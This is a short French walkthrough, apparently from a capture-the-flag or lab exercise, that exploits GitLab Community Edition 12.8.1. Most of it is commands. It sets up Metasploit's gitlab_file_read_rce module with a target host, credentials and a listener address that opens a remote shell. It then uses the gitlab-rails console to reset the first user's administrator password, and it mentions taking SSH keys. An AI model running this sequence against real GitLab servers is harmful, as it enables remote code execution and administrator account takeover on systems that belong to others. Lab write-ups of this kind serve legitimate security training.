IL existe certaines versions de GitLab Community Edition Vulnerable. Par exemple, la version 12.8.1 est vulnérable
use exploit/multi/http/gitlab_file_read_rce
set rhosts 10.9.0.69
set rport 443
set vhost git.searchevolution.com
set username r0cker
set password blabla
set ssl true
set lhost 10.9.0.60
exploit
bash -i
Par la suite, on est dans un shell, mais nous ne pouvons faire d’énumération. Ce que nous pouvons faire, est de changer le mot de pass administrateur.
bash -i
gitlab-rails console
user=User.find(1)
user.password = "4444"
user.password_confirmation = "4444"
user.save!
Nous pouvons maintenant accéder à l’interface web avec le nom d’usager trouvé et peut-être récupérer la clé ssh et se connecter.